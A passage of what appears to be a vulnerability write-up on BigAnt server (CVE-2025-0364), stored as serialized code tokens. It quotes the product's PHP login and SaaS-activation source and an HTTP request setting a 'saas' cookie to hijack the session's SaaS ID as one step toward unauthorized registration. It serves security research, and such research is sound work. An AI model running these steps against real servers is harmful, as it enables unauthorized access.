cookie",[1373,49745,1384],{"class":1383},[1373,49747,1388],{"class":1387},[1373,49749,48888],{"class":1391},[1373,49751,1388],{"class":1387},[1373,49753,4680],{"class":1383},[1373,49755,49756],{"class":1375,"line":4817},[1373,49757,4795],{"class":1383},[1373,49759,49760],{"class":1375,"line":4825},[1373,49761,47181],{"class":4640},[1373,49763,49764],{"class":1375,"line":4835},[1373,49765,6520],{"emptyLinePlaceholder":237},[1373,49767,49768],{"class":1375,"line":4843},[1373,49769,47181],{"class":4640},[1373,49771,49772],{"class":1375,"line":4849},[1373,49773,49774],{"class":4630},"    \u002F\u002F20170418 
针对只有一个SAAS的企业，默认给出企业ID\n",[1373,49776,49777],{"class":1375,"line":4877},[1373,49778,49779],{"class":4630},"    \u002F\u002F李成提的需求\n",[1373,49781,49782,49784,49786,49788,49790,49792,49794,49796,49798],{"class":1375,"line":4915},[1373,49783,7362],{"class":1383},[1373,49785,47697],{"class":4640},[1373,49787,5417],{"class":1397},[1373,49789,47702],{"class":7297},[1373,49791,1384],{"class":1383},[1373,49793,1388],{"class":1387},[1373,49795,47709],{"class":1391},[1373,49797,1388],{"class":1387},[1373,49799,4680],{"class":1383},[1373,49801,49802,49804,49806,49808,49810],{"class":1375,"line":4931},[1373,49803,7362],{"class":1383},[1373,49805,47772],{"class":4640},[1373,49807,5417],{"class":1397},[1373,49809,15680],{"class":7054},[1373,49811,47289],{"class":1383},[1373,49813,49814,49816,49818,49820],{"class":1375,"line":4947},[1373,49815,4695],{"class":4636},[1373,49817,47425],{"class":1383},[1373,49819,48888],{"class":4640},[1373,49821,47430],{"class":1383},[1373,49823,49824],{"class":1375,"line":4952},[1373,49825,49826],{"class":4630},"        \u002F\u002F20170518 如果是登妨系统管理台，那个数据库密码如果是 
默认密码，那么显示出来\n",[1373,49828,49829,49831,49833,49835,49837,49839,49841,49843,49845,49847,49849,49851,49853,49855,49857,49859,49861,49863,49865,49868,49870,49872,49874,49876,49879],{"class":1375,"line":6776},[1373,49830,4727],{"class":1383},[1373,49832,47772],{"class":4640},[1373,49834,5417],{"class":1397},[1373,49836,4656],{"class":1383},[1373,49838,47367],{"class":4640},[1373,49840,4667],{"class":1397},[1373,49842,47926],{"class":7297},[1373,49844,1384],{"class":1383},[1373,49846,47234],{"class":1379},[1373,49848,1384],{"class":1383},[1373,49850,1388],{"class":1387},[1373,49852,46826],{"class":1391},[1373,49854,1388],{"class":1387},[1373,49856,47245],{"class":1397},[1373,49858,4644],{"class":1383},[1373,49860,48888],{"class":4640},[1373,49862,27548],{"class":1383},[1373,49864,4667],{"class":1397},[1373,49866,49867],{"class":7297},"fetchSql",[1373,49869,1384],{"class":1383},[1373,49871,5971],{"class":7054},[1373,49873,2230],{"class":1383},[1373,49875,4667],{"class":1397},[1373,49877,49878],{"class":7297},"select",[1373,49880,15603],{"class":1383},[1373,49882,49883],{"class":1375,"line":6781},[1373,49884,4795],{"class":1383},[1373,49886,49887],{"class":1375,"line":7524},[1373,49888,6520],{"emptyLinePlaceholder":237},[1373,49890,49891],{"class":1375,"line":7530},[1373,49892,49893],{"class":4630},"    
\u002F\u002F\n",[1373,49895,49896,49898,49900,49902,49904,49906],{"class":1375,"line":7546},[1373,49897,4695],{"class":4636},[1373,49899,4641],{"class":1383},[1373,49901,16090],{"class":1397},[1373,49903,4656],{"class":1383},[1373,49905,9156],{"class":4640},[1373,49907,47430],{"class":1383},[1373,49909,49910,49912,49914,49916,49918,49920,49922,49924,49926,49928,49930,49932,49934],{"class":1375,"line":7571},[1373,49911,4727],{"class":1383},[1373,49913,47772],{"class":4640},[1373,49915,5417],{"class":1397},[1373,49917,4656],{"class":1383},[1373,49919,47367],{"class":4640},[1373,49921,4667],{"class":1397},[1373,49923,49867],{"class":7297},[1373,49925,1384],{"class":1383},[1373,49927,5971],{"class":7054},[1373,49929,2230],{"class":1383},[1373,49931,4667],{"class":1397},[1373,49933,49878],{"class":7297},[1373,49935,15603],{"class":1383},[1373,49937,49938,49940],{"class":1375,"line":7598},[1373,49939,28032],{"class":1383},[1373,49941,19298],{"class":4640},[1373,49943,49944],{"class":1375,"line":7615},[1373,49945,6520],{"emptyLinePlaceholder":237},[1373,49947,49948],{"class":1375,"line":7635},[1373,49949,47181],{"class":4640},[1373,49951,49952,49954,49956,49958,49960,49962,49964,49966,49968,49970,49972,49974,49976],{"class":1375,"line":7640},[1373,49953,7362],{"class":1383},[1373,49955,49698],{"class":4640},[1373,49957,5417],{"class":1397},[1373,49959,4656],{"class":1383},[1373,49961,9156],{"class":4640},[1373,49963,7035],{"class":1383},[1373,49965,445],{"class":5467},[1373,49967,11832],{"class":1383},[1373,49969,1388],{"class":1387},[1373,49971,46826],{"class":1391},[1373,49973,1388],{"class":1387},[1373,49975,15050],{"class":1383},[1373,49977,47289],{"class":1383},[1373,49979,49980],{"class":1375,"line":7648},[1373,49981,6520],{"emptyLinePlaceholder":237},[1373,49983,49984],{"class":1375,"line":7672},[1373,49985,47181],{"class":4640},[1373,49987,49988],{"class":1375,"line":7688},[1373,49989,6520],{"emptyLinePlaceholder":237},[1373,49991,49992],{"class":1375,"line":7709},
[1373,49993,49994],{"class":4630},"    \u002F\u002F20170419 加入默认的帐号\n",[1373,49996,49997,49999,50002,50004,50007,50009,50012,50014,50016,50019,50021,50023],{"class":1375,"line":7714},[1373,49998,7362],{"class":1383},[1373,50000,50001],{"class":4640},"account ",[1373,50003,5417],{"class":1397},[1373,50005,50006],{"class":1379}," htmlspecialchars",[1373,50008,34467],{"class":1383},[1373,50010,50011],{"class":4640},"_COOKIE",[1373,50013,7035],{"class":1383},[1373,50015,1388],{"class":1387},[1373,50017,50018],{"class":1391},"account",[1373,50020,1388],{"class":1387},[1373,50022,48026],{"class":1383},[1373,50024,47289],{"class":1383},[1373,50026,50027,50029,50031,50033,50035,50037],{"class":1375,"line":7722},[1373,50028,4695],{"class":4636},[1373,50030,4641],{"class":1383},[1373,50032,16090],{"class":1397},[1373,50034,4656],{"class":1383},[1373,50036,50018],{"class":4640},[1373,50038,47430],{"class":1383},[1373,50040,50041,50043,50045,50047,50049,50052,50054],{"class":1375,"line":9903},[1373,50042,4727],{"class":1383},[1373,50044,50001],{"class":4640},[1373,50046,5417],{"class":1397},[1373,50048,4713],{"class":1387},[1373,50050,50051],{"class":1391},"superadmin",[1373,50053,1388],{"class":1387},[1373,50055,4912],{"class":1383},[1373,50057,50058],{"class":1375,"line":9908},[1373,50059,4795],{"class":1383},[1373,50061,50062],{"class":1375,"line":9913},[1373,50063,47181],{"class":4640},[1373,50065,50066],{"class":1375,"line":9932},[1373,50067,47181],{"class":4640},[1373,50069,50070,50073,50075,50078,50080,50082,50084,50086,50088,50090,50092],{"class":1375,"line":9937},[1373,50071,50072],{"class":34505},"    
$this",[1373,50074,4667],{"class":1397},[1373,50076,50077],{"class":7297},"assign",[1373,50079,1384],{"class":1383},[1373,50081,1388],{"class":1387},[1373,50083,48888],{"class":1391},[1373,50085,1388],{"class":1387},[1373,50087,47335],{"class":1383},[1373,50089,48888],{"class":4640},[1373,50091,2230],{"class":1383},[1373,50093,47289],{"class":1383},[1373,50095,50096,50098,50100,50102,50104,50106,50108,50110,50112,50114,50116],{"class":1375,"line":9957},[1373,50097,50072],{"class":34505},[1373,50099,4667],{"class":1397},[1373,50101,50077],{"class":7297},[1373,50103,1384],{"class":1383},[1373,50105,1388],{"class":1387},[1373,50107,50018],{"class":1391},[1373,50109,1388],{"class":1387},[1373,50111,47335],{"class":1383},[1373,50113,50018],{"class":4640},[1373,50115,2230],{"class":1383},[1373,50117,47289],{"class":1383},[1373,50119,50120,50122,50124,50126,50128,50130,50133,50135,50137,50140,50142,50144,50147,50149,50151,50153,50155,50157,50159,50161,50163,50165,50168,50170,50172],{"class":1375,"line":9962},[1373,50121,50072],{"class":34505},[1373,50123,4667],{"class":1397},[1373,50125,50077],{"class":7297},[1373,50127,1384],{"class":1383},[1373,50129,1388],{"class":1387},[1373,50131,50132],{"class":1391},"metaTitle",[1373,50134,1388],{"class":1387},[1373,50136,5437],{"class":1383},[1373,50138,50139],{"class":7297},"C",[1373,50141,1384],{"class":1383},[1373,50143,1388],{"class":1387},[1373,50145,50146],{"class":1391},"PRODUCT_NAME",[1373,50148,1388],{"class":1387},[1373,50150,2230],{"class":1383},[1373,50152,1398],{"class":1397},[1373,50154,4713],{"class":1387},[1373,50156,4713],{"class":1387},[1373,50158,1398],{"class":1397},[1373,50160,47275],{"class":7297},[1373,50162,1384],{"class":1383},[1373,50164,1388],{"class":1387},[1373,50166,50167],{"class":1391},"_LOGIN_TITLE_",[1373,50169,1388],{"class":1387},[1373,50171,27548],{"class":1383},[1373,50173,47289],{"class":1383},[1373,50175,50176,50178,50180,50182,50184,50186,50188,50190,50192,50194,50196],{"class":1375,"line":1
5955},[1373,50177,50072],{"class":34505},[1373,50179,4667],{"class":1397},[1373,50181,50077],{"class":7297},[1373,50183,1384],{"class":1383},[1373,50185,1388],{"class":1387},[1373,50187,49646],{"class":1391},[1373,50189,1388],{"class":1387},[1373,50191,47335],{"class":1383},[1373,50193,49646],{"class":4640},[1373,50195,2230],{"class":1383},[1373,50197,47289],{"class":1383},[1373,50199,50200,50202,50204,50206,50208,50210,50212,50214,50216,50218,50220],{"class":1375,"line":16030},[1373,50201,50072],{"class":34505},[1373,50203,4667],{"class":1397},[1373,50205,50077],{"class":7297},[1373,50207,1384],{"class":1383},[1373,50209,1388],{"class":1387},[1373,50211,49687],{"class":1391},[1373,50213,1388],{"class":1387},[1373,50215,47335],{"class":1383},[1373,50217,49687],{"class":4640},[1373,50219,2230],{"class":1383},[1373,50221,47289],{"class":1383},[1373,50223,50224],{"class":1375,"line":16035},[1373,50225,47181],{"class":4640},[1373,50227,50228,50230,50232,50234,50236,50238,50241,50243],{"class":1375,"line":16083},[1373,50229,4695],{"class":4636},[1373,50231,1384],{"class":1383},[1373,50233,14056],{"class":7297},[1373,50235,1384],{"class":1383},[1373,50237,1388],{"class":1387},[1373,50239,50240],{"class":1391},"flag",[1373,50242,1388],{"class":1387},[1373,50244,50245],{"class":1383},")){\n",[1373,50247,50248,50250,50252,50254,50256,50258,50260,50262,50264,50266,50268,50270,50272,50274,50276],{"class":1375,"line":16098},[1373,50249,47549],{"class":34505},[1373,50251,4667],{"class":1397},[1373,50253,50077],{"class":7297},[1373,50255,1384],{"class":1383},[1373,50257,1388],{"class":1387},[1373,50259,50240],{"class":1391},[1373,50261,1388],{"class":1387},[1373,50263,5437],{"class":1383},[1373,50265,14056],{"class":7297},[1373,50267,1384],{"class":1383},[1373,50269,1388],{"class":1387},[1373,50271,50240],{"class":1391},[1373,50273,1388],{"class":1387},[1373,50275,27548],{"class":1383},[1373,50277,47289],{"class":1383},[1373,50279,50280],{"class":1375,"line":16103},[1373,50281,47
95],{"class":1383},[18,50283,50284,50285,50287,50288,50290,50291,50294],{},"In summary, the main login page index function will look for an assigned ",[886,50286,48888],{}," session; if none is found, it will look for a cookie named ",[886,50289,48888],{}," and assign (via ",[886,50292,50293],{},"$this->assign()",") any matching SaaS organization set in that cookie to the session.",[18,50296,50297,50298,50301],{},"In order to test this we can request the login page with a ",[886,50299,50300],{},"saas=aaa"," cookie set in a new session:",[1354,50303,50305],{"className":8228,"code":50304,"language":8230,"meta":219,"style":219},"GET \u002Findex.php\u002FHome\u002FLogin\u002Findex.html HTTP\u002F1.1\nHost: 10.0.0.104:8000\nAccept-Language: en-US,en;q=0.9\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F129.0.6668.71 Safari\u002F537.36\nAccept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\nCookie: saas=aaa\n\n\n",[886,50306,50307,50312,50317,50322,50327,50332,50337,50342,50347],{"__ignoreMap":219},[1373,50308,50309],{"class":1375,"line":1376},[1373,50310,50311],{"class":4640},"GET \u002Findex.php\u002FHome\u002FLogin\u002Findex.html HTTP\u002F1.1\n",[1373,50313,50314],{"class":1375,"line":220},[1373,50315,50316],{"class":4640},"Host: 10.0.0.104:8000\n",[1373,50318,50319],{"class":1375,"line":1266},[1373,50320,50321],{"class":4640},"Accept-Language: en-US,en;q=0.9\n",[1373,50323,50324],{"class":1375,"line":1852},[1373,50325,50326],{"class":4640},"Upgrade-Insecure-Requests: 1\n",[1373,50328,50329],{"class":1375,"line":4692},[1373,50330,50331],{"class":4640},"User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F129.0.6668.71 
Safari\u002F537.36\n",[1373,50333,50334],{"class":1375,"line":4724},[1373,50335,50336],{"class":4640},"Accept: text\u002Fhtml,application\u002Fxhtml+xml,application\u002Fxml;q=0.9,image\u002Favif,image\u002Fwebp,image\u002Fapng,*\u002F*;q=0.8,application\u002Fsigned-exchange;v=b3;q=0.7\n",[1373,50338,50339],{"class":1375,"line":4756},[1373,50340,50341],{"class":4640},"Accept-Encoding: gzip, deflate, br\n",[1373,50343,50344],{"class":1375,"line":4768},[1373,50345,50346],{"class":4640},"Connection: keep-alive\n",[1373,50348,50349],{"class":1375,"line":4792},[1373,50350,50351],{"class":4640},"Cookie: saas=aaa\n",[18,50353,50354,50355,50357],{},"Then, take the session cookie from the above request and revisit the demo page to trigger the ",[886,50356,49446],{}," output:",[18,50359,50360],{},[68,50361],{"alt":50362,"src":50363,":width":10862},"BigAnt demo page with attacker controlled SaaS","\u002Fblog\u002Fbigant-cve-2025-0364\u002Fbigant-5-demo-page-fixed-saas.png",[18,50365,50366,50367,50369,50370,50372],{},"Bingo. We have tied the ",[886,50368,48888],{}," that we registered to our controlled value for the session and were able to successfully retrieve the ",[886,50371,49446],{}," value.",[18,50374,50375,50376,4606],{},"All that's left is to verify the original hypothesis and attempt to complete the registration of the SaaS organization. 
The core function for registration activation lives in ",[886,50377,50378],{},"Application\u002FHome\u002FController\u002FSaasController.class.php:411",[1354,50380,50382],{"className":1367,"code":50381,"language":1369,"meta":219,"style":219},"\u002F**\n * 激活SAAS\n * 1、获得SAAS\n * 2、判断是否超时\n * 3、判断是否激活\n * 4、激活SAAS\n *\u002F\nfunction reg_activation(){\n    $saasId = I('saas_id');\n    \n    $M = D('Common\u002FSaas');\n    $info = $M->find($saasId) ;\n    \n    \u002F\u002F判断是否有数据\n    if (!$info){\n        $this->error(L('_ACTIVATION_ERROR_NODATA_')) ;\n    }\n    \n    \u002F\u002F判断是否已经激活了\n    if ($info['saas_status']){\n        $this->error(L('_ACTIVATION_ERROR_ALREALY_')) ;\n    }\n    \n    \u002F\u002F判断是否过期\n    if ($M->isExpire($info['saas_create_date'])){\n        $this->error(L('_ACTIVATION_ERROR_EXPIRE_')) ;\n    }\n    \n    \u002F\u002F激活数据\n    $saasName = $info['saas_name'] ;\n    $res = $M->activationSaas($saasName) ;\n    \n    if ($res){\n        $url = U('reg_complete',array('saas'=>$saasName));\n        $this->success(L('_ACTIVATION_SUCCESS_'), $url);\n    }else{\n        $this->error(L('_ACTIVATION_ERROR_'));\n    }\n}\n",[886,50383,50384,50388,50393,50398,50403,50408,50413,50417,50426,50447,50451,50471,50496,50500,50505,50520,50545,50549,50553,50558,50576,50601,50605,50609,50614,50643,50668,50672,50676,50681,50706,50732,50736,50746,50785,50814,50822,50845,50849],{"__ignoreMap":219},[1373,50385,50386],{"class":1375,"line":1376},[1373,50387,47086],{"class":4630},[1373,50389,50390],{"class":1375,"line":220},[1373,50391,50392],{"class":4630}," * 激活SAAS\n",[1373,50394,50395],{"class":1375,"line":1266},[1373,50396,50397],{"class":4630}," * 1、获得SAAS\n",[1373,50399,50400],{"class":1375,"line":1852},[1373,50401,50402],{"class":4630}," * 2、判断是否超时\n",[1373,50404,50405],{"class":1375,"line":4692},[1373,50406,50407],{"class":4630}," * 3、判断是否激活\n",[1373,50409,50410],{"class":1375,"line":4724},[1373,50411,50412],{"class":4630}," * 
4、激活SAAS\n",[1373,50414,50415],{"class":1375,"line":4756},[1373,50416,47111],{"class":4630},[1373,50418,50419,50421,50424],{"class":1375,"line":4768},[1373,50420,8560],{"class":7293},[1373,50422,50423],{"class":7297}," reg_activation",[1373,50425,47121],{"class":1383},[1373,50427,50428,50430,50433,50435,50437,50439,50441,50443,50445],{"class":1375,"line":4792},[1373,50429,7362],{"class":1383},[1373,50431,50432],{"class":4640},"saasId ",[1373,50434,5417],{"class":1397},[1373,50436,49639],{"class":7297},[1373,50438,1384],{"class":1383},[1373,50440,1388],{"class":1387},[1373,50442,47076],{"class":1391},[1373,50444,1388],{"class":1387},[1373,50446,4680],{"class":1383},[1373,50448,50449],{"class":1375,"line":4798},[1373,50450,47181],{"class":4640},[1373,50452,50453,50455,50457,50459,50461,50463,50465,50467,50469],{"class":1375,"line":4806},[1373,50454,7362],{"class":1383},[1373,50456,47697],{"class":4640},[1373,50458,5417],{"class":1397},[1373,50460,47702],{"class":7297},[1373,50462,1384],{"class":1383},[1373,50464,1388],{"class":1387},[1373,50466,47709],{"class":1391},[1373,50468,1388],{"class":1387},[1373,50470,4680],{"class":1383},[1373,50472,50473,50475,50478,50480,50482,50484,50486,50488,50490,50492,50494],{"class":1375,"line":4817},[1373,50474,7362],{"class":1383},[1373,50476,50477],{"class":4640},"info ",[1373,50479,5417],{"class":1397},[1373,50481,4656],{"class":1383},[1373,50483,47367],{"class":4640},[1373,50485,4667],{"class":1397},[1373,50487,47975],{"class":7297},[1373,50489,34467],{"class":1383},[1373,50491,47250],{"class":4640},[1373,50493,2230],{"class":1383},[1373,50495,47289],{"class":1383},[1373,50497,50498],{"class":1375,"line":4825},[1373,50499,47181],{"class":4640},[1373,50501,50502],{"class":1375,"line":4835},[1373,50503,50504],{"class":4630},"    
\u002F\u002F判断是否有数据\n",[1373,50506,50507,50509,50511,50513,50515,50518],{"class":1375,"line":4843},[1373,50508,4695],{"class":4636},[1373,50510,4641],{"class":1383},[1373,50512,16090],{"class":1397},[1373,50514,4644],{"class":1383},[1373,50516,50517],{"class":4640},"info",[1373,50519,47430],{"class":1383},[1373,50521,50522,50524,50526,50528,50530,50532,50534,50536,50539,50541,50543],{"class":1375,"line":4849},[1373,50523,47549],{"class":34505},[1373,50525,4667],{"class":1397},[1373,50527,10265],{"class":7297},[1373,50529,1384],{"class":1383},[1373,50531,13918],{"class":7297},[1373,50533,1384],{"class":1383},[1373,50535,1388],{"class":1387},[1373,50537,50538],{"class":1391},"_ACTIVATION_ERROR_NODATA_",[1373,50540,1388],{"class":1387},[1373,50542,27548],{"class":1383},[1373,50544,47289],{"class":1383},[1373,50546,50547],{"class":1375,"line":4877},[1373,50548,4795],{"class":1383},[1373,50550,50551],{"class":1375,"line":4915},[1373,50552,47181],{"class":4640},[1373,50554,50555],{"class":1375,"line":4931},[1373,50556,50557],{"class":4630},"    
\u002F\u002F判断是否已经激活了\n",[1373,50559,50560,50562,50564,50566,50568,50570,50572,50574],{"class":1375,"line":4947},[1373,50561,4695],{"class":4636},[1373,50563,47425],{"class":1383},[1373,50565,50517],{"class":4640},[1373,50567,7035],{"class":1383},[1373,50569,1388],{"class":1387},[1373,50571,47849],{"class":1391},[1373,50573,1388],{"class":1387},[1373,50575,47201],{"class":1383},[1373,50577,50578,50580,50582,50584,50586,50588,50590,50592,50595,50597,50599],{"class":1375,"line":4952},[1373,50579,47549],{"class":34505},[1373,50581,4667],{"class":1397},[1373,50583,10265],{"class":7297},[1373,50585,1384],{"class":1383},[1373,50587,13918],{"class":7297},[1373,50589,1384],{"class":1383},[1373,50591,1388],{"class":1387},[1373,50593,50594],{"class":1391},"_ACTIVATION_ERROR_ALREALY_",[1373,50596,1388],{"class":1387},[1373,50598,27548],{"class":1383},[1373,50600,47289],{"class":1383},[1373,50602,50603],{"class":1375,"line":6776},[1373,50604,4795],{"class":1383},[1373,50606,50607],{"class":1375,"line":6781},[1373,50608,47181],{"class":4640},[1373,50610,50611],{"class":1375,"line":7524},[1373,50612,50613],{"class":4630},"    
\u002F\u002F判断是否过期\n",[1373,50615,50616,50618,50620,50622,50624,50627,50629,50631,50633,50635,50638,50640],{"class":1375,"line":7530},[1373,50617,4695],{"class":4636},[1373,50619,47425],{"class":1383},[1373,50621,47367],{"class":4640},[1373,50623,4667],{"class":1397},[1373,50625,50626],{"class":7297},"isExpire",[1373,50628,34467],{"class":1383},[1373,50630,50517],{"class":4640},[1373,50632,7035],{"class":1383},[1373,50634,1388],{"class":1387},[1373,50636,50637],{"class":1391},"saas_create_date",[1373,50639,1388],{"class":1387},[1373,50641,50642],{"class":1383},"])){\n",[1373,50644,50645,50647,50649,50651,50653,50655,50657,50659,50662,50664,50666],{"class":1375,"line":7546},[1373,50646,47549],{"class":34505},[1373,50648,4667],{"class":1397},[1373,50650,10265],{"class":7297},[1373,50652,1384],{"class":1383},[1373,50654,13918],{"class":7297},[1373,50656,1384],{"class":1383},[1373,50658,1388],{"class":1387},[1373,50660,50661],{"class":1391},"_ACTIVATION_ERROR_EXPIRE_",[1373,50663,1388],{"class":1387},[1373,50665,27548],{"class":1383},[1373,50667,47289],{"class":1383},[1373,50669,50670],{"class":1375,"line":7571},[1373,50671,4795],{"class":1383},[1373,50673,50674],{"class":1375,"line":7598},[1373,50675,47181],{"class":4640},[1373,50677,50678],{"class":1375,"line":7615},[1373,50679,50680],{"class":4630},"    \u002F\u002F激活数据\n",[1373,50682,50683,50685,50688,50690,50692,50694,50696,50698,50700,50702,50704],{"class":1375,"line":7635},[1373,50684,7362],{"class":1383},[1373,50686,50687],{"class":4640},"saasName 
",[1373,50689,5417],{"class":1397},[1373,50691,4656],{"class":1383},[1373,50693,50517],{"class":4640},[1373,50695,7035],{"class":1383},[1373,50697,1388],{"class":1387},[1373,50699,46826],{"class":1391},[1373,50701,1388],{"class":1387},[1373,50703,15050],{"class":1383},[1373,50705,47289],{"class":1383},[1373,50707,50708,50710,50712,50714,50716,50718,50720,50723,50725,50728,50730],{"class":1375,"line":7640},[1373,50709,7362],{"class":1383},[1373,50711,47161],{"class":4640},[1373,50713,5417],{"class":1397},[1373,50715,4656],{"class":1383},[1373,50717,47367],{"class":4640},[1373,50719,4667],{"class":1397},[1373,50721,50722],{"class":7297},"activationSaas",[1373,50724,34467],{"class":1383},[1373,50726,50727],{"class":4640},"saasName",[1373,50729,2230],{"class":1383},[1373,50731,47289],{"class":1383},[1373,50733,50734],{"class":1375,"line":7648},[1373,50735,47181],{"class":4640},[1373,50737,50738,50740,50742,50744],{"class":1375,"line":7672},[1373,50739,4695],{"class":4636},[1373,50741,47425],{"class":1383},[1373,50743,47190],{"class":4640},[1373,50745,47430],{"class":1383},[1373,50747,50748,50750,50752,50754,50756,50758,50760,50763,50765,50767,50769,50771,50773,50775,50777,50779,50781,50783],{"class":1375,"line":7688},[1373,50749,4727],{"class":1383},[1373,50751,47208],{"class":4640},[1373,50753,5417],{"class":1397},[1373,50755,47220],{"class":7297},[1373,50757,1384],{"class":1383},[1373,50759,1388],{"class":1387},[1373,50761,50762],{"class":1391},"reg_complete",[1373,50764,1388],{"class":1387},[1373,50766,5437],{"class":1383},[1373,50768,47234],{"class":1379},[1373,50770,1384],{"class":1383},[1373,50772,1388],{"class":1387},[1373,50774,48888],{"class":1391},[1373,50776,1388],{"class":1387},[1373,50778,47245],{"class":1397},[1373,50780,4644],{"class":1383},[1373,50782,50727],{"class":4640},[1373,50784,1413],{"class":1383},[1373,50786,50787,50789,50791,50793,50795,50797,50799,50801,50804,50806,50808,50810,50812],{"class":1375,"line":7709},[1373,50788,47549],{"class":34505
},[1373,50790,4667],{"class":1397},[1373,50792,16142],{"class":7297},[1373,50794,1384],{"class":1383},[1373,50796,13918],{"class":7297},[1373,50798,1384],{"class":1383},[1373,50800,1388],{"class":1387},[1373,50802,50803],{"class":1391},"_ACTIVATION_SUCCESS_",[1373,50805,1388],{"class":1387},[1373,50807,15534],{"class":1383},[1373,50809,4656],{"class":1383},[1373,50811,7585],{"class":4640},[1373,50813,4680],{"class":1383},[1373,50815,50816,50818,50820],{"class":1375,"line":7714},[1373,50817,28032],{"class":1383},[1373,50819,4762],{"class":4636},[1373,50821,8904],{"class":1383},[1373,50823,50824,50826,50828,50830,50832,50834,50836,50838,50841,50843],{"class":1375,"line":7722},[1373,50825,47549],{"class":34505},[1373,50827,4667],{"class":1397},[1373,50829,10265],{"class":7297},[1373,50831,1384],{"class":1383},[1373,50833,13918],{"class":7297},[1373,50835,1384],{"class":1383},[1373,50837,1388],{"class":1387},[1373,50839,50840],{"class":1391},"_ACTIVATION_ERROR_",[1373,50842,1388],{"class":1387},[1373,50844,1413],{"class":1383},[1373,50846,50847],{"class":1375,"line":9903},[1373,50848,4795],{"class":1383},[1373,50850,50851],{"class":1375,"line":9908},[1373,50852,1855],{"class":1383},[18,50854,50855,50856,50858,50859,50861,50862,50864,50865,4606],{},"If the activation data is correct and the ",[886,50857,47076],{}," is the same as the ",[886,50860,49446],{}," then this function calls ",[886,50863,50722],{}," in ",[886,50866,50867],{},"Application\u002FCommon\u002FModel\u002FSaasModel.class.php:146",[1354,50869,50871],{"className":1367,"code":50870,"language":1369,"meta":219,"style":219},"\u002F**\n * 激活SAAS\n * @param unknown $saasName 企业ID (在LINUX上安装的时候会出现SAASID变成1,不知道什么原因，所以这里用企业ID来判断)\n * @param unknown $password 明文密码 用于发邮件\n *\u002F\npublic function activationSaas($saasName){\n\n    $where['saas_name'] = $saasName;\n    $info = $this->where($where)->find();\n    \n    $saasId = $info['saas_id'];\n    $saasName = $info['saas_name'];\n    $dbName = 
$info['saas_dbname'];\n    $adminPassword = $info['saas_pwd'];\n    $installDate = $info['saas_installdate'] ;\n    \n    if (! $info){\n        return false ;\n    }\n    \n    \u002F\u002F创建数据库\n    $res = $this->createDB($info);\n    \n    \u002F\u002F设置SAAS的服务关系\n    if ($res){\n        $M = D('Ms\u002Fserver');\n        $server = $M->where(array('server_type',2))->find();\n        \n        if ($server){\n            $serverId = $server['server_id'];\n            $sql = \" insert into sys_saas_server(gid,saas_id,login_server_id,server_is_mast) values('\" . sp_get_guid(). \"','$saasId','$serverId',1)\" ;\n            $M->db->execute($sql);\n        }\n    }\n    \n    \u002F\u002F更新状态\n    $data['saas_status'] = 1 ;\n    $data['saas_id'] = $saasId ;\n    if (! $installDate){\n        $data['saas_installdate'] = \\Common\\Lib\\AntCmd::getTryCode();\n        $data['auth_numbers'] = \\Common\\Lib\\AntCmd::encrypt(50);\n        $data['auth_expiredate'] = \\Common\\Lib\\AntCmd::encrypt(strtotime(date('Y-m-d H:i:s',strtotime('+15 day'))));\n    }\n    $this->save($data);\n    \n    \u002F\u002F发送邮件通知\n    if ($this->is_send_activation_email){\n        $this->sendMailNotify($info);\n    }\n    \n    \n    return true ;\n    \n}\n",[886,50872,50873,50877,50881,50893,50904,50908,50923,50927,50951,50977,50981,51003,51025,51049,51072,51098,51102,51116,51124,51128,51132,51137,51158,51162,51167,51177,51198,51240,51245,51256,51280,51328,51350,51354,51358,51362,51367,51389,51413,51428,51466,51508,51578,51582,51597,51601,51606,51621,51636,51640,51644,51648,51656,51660],{"__ignoreMap":219},[1373,50874,50875],{"class":1375,"line":1376},[1373,50876,47086],{"class":4630},[1373,50878,50879],{"class":1375,"line":220},[1373,50880,50392],{"class":4630},[1373,50882,50883,50885,50887,50890],{"class":1375,"line":1266},[1373,50884,47618],{"class":4630},[1373,50886,47622],{"class":47621},[1373,50888,50889],{"class":47625}," unknown",[1373,50891,50892],{"class":4630}," $saasName 企业ID 
(在LINUX上安装的时候会出现SAASID变成1,不知道什么原因，所以这里用企业ID来判断)\n",[1373,50894,50895,50897,50899,50901],{"class":1375,"line":1852},[1373,50896,47618],{"class":4630},[1373,50898,47622],{"class":47621},[1373,50900,50889],{"class":47625},[1373,50902,50903],{"class":4630}," $password 明文密码 用于发邮件\n",[1373,50905,50906],{"class":1375,"line":4692},[1373,50907,47111],{"class":4630},[1373,50909,50910,50912,50914,50917,50919,50921],{"class":1375,"line":4724},[1373,50911,15019],{"class":4652},[1373,50913,49619],{"class":7293},[1373,50915,50916],{"class":7297}," activationSaas",[1373,50918,34467],{"class":1383},[1373,50920,50727],{"class":4640},[1373,50922,47430],{"class":1383},[1373,50924,50925],{"class":1375,"line":4756},[1373,50926,6520],{"emptyLinePlaceholder":237},[1373,50928,50929,50931,50933,50935,50937,50939,50941,50943,50945,50947,50949],{"class":1375,"line":4768},[1373,50930,7362],{"class":1383},[1373,50932,47926],{"class":4640},[1373,50934,7035],{"class":1383},[1373,50936,1388],{"class":1387},[1373,50938,46826],{"class":1391},[1373,50940,1388],{"class":1387},[1373,50942,15050],{"class":1383},[1373,50944,8575],{"class":1397},[1373,50946,4656],{"class":1383},[1373,50948,50727],{"class":4640},[1373,50950,4912],{"class":1383},[1373,50952,50953,50955,50957,50959,50961,50963,50965,50967,50969,50971,50973,50975],{"class":1375,"line":4792},[1373,50954,7362],{"class":1383},[1373,50956,50477],{"class":4640},[1373,50958,5417],{"class":1397},[1373,50960,35288],{"class":34505},[1373,50962,4667],{"class":1397},[1373,50964,47926],{"class":7297},[1373,50966,34467],{"class":1383},[1373,50968,47926],{"class":4640},[1373,50970,2230],{"class":1383},[1373,50972,4667],{"class":1397},[1373,50974,47975],{"class":7297},[1373,50976,15603],{"class":1383},[1373,50978,50979],{"class":1375,"line":4798},[1373,50980,47181],{"class":4640},[1373,50982,50983,50985,50987,50989,50991,50993,50995,50997,50999,